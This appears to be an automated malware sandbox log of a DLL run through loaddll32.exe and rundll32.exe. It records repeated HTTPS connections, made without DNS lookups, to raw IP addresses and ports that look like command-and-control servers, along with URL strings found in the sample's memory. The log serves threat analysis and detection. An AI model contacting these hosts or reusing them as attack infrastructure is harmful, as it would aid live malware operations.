                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:45:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000004.00000003.393252545.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?05d49d65b62de
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.575651265.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.778016005.000000000099D000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.618146216.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/%
                      Source: loaddll32.exe, 00000000.00000003.525073328.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/(
                      Source: loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.660175642.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/:
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/My
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/X
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.733634731.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/em32
                      Source: loaddll32.exe, 00000000.00000003.643705364.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/frthe.computer
                      Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/g_
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/h
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.525073328.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.643705364.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/k
                      Source: loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: loaddll32.exe, 00000000.00000003.583869390.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l3
                      Source: loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/la
                      Source: loaddll32.exe, 00000000.00000003.618146216.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.668641353.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.700253725.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.660175642.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://145.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.408320387.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/Wl
                      Source: rundll32.exe, 00000004.00000002.785394155.00000000035BD000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/(
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.457343535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/2
                      Source: loaddll32.exe, 00000000.00000003.733634731.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4&b
                      Source: loaddll32.exe, 00000000.00000003.668641353.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/h
                      Source: loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4h
                      Source: loaddll32.exe, 00000000.00000003.700253725.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Ps%
                      Source: loaddll32.exe, 00000000.00000003.583869390.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Ub
                      Source: loaddll32.exe, 00000000.00000003.679541732.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/b
                      Source: loaddll32.exe, 00000000.00000003.600285042.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/fW
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/h
                      Source: loaddll32.exe, 00000000.00000003.408320387.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ll
                      Source: loaddll32.exe, 00000000.00000003.643705364.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ll8b
